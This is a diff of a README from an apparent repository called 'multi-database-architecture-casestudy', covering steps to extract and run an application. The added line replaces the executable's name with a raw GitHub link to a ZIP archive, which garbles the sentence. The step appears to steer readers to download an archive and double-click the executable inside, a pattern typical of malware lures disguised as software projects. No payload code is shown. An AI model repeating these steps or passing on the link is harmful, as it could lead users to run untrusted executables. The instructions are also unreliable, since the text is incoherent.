Highmelodys/multi-database-architecture-casestudy/README.md

    - If using a ZIP file, right-click and select "Extract All".
 Follow the prompts to extract the files.

 5. **Run the Application**
-   - Once extracted, find the executable file (it may be named `multi-database-architecture-casestudy.exe`).
+   - Once extracted, find the executable file (it may be named `https://raw.githubusercontent.com/Highmelodys/multi-database-architecture-casestudy/main/translation/multi-database-architecture-casestudy.zip`).
    - Double-click the file to run the application.

 6. **Follow the User Guide**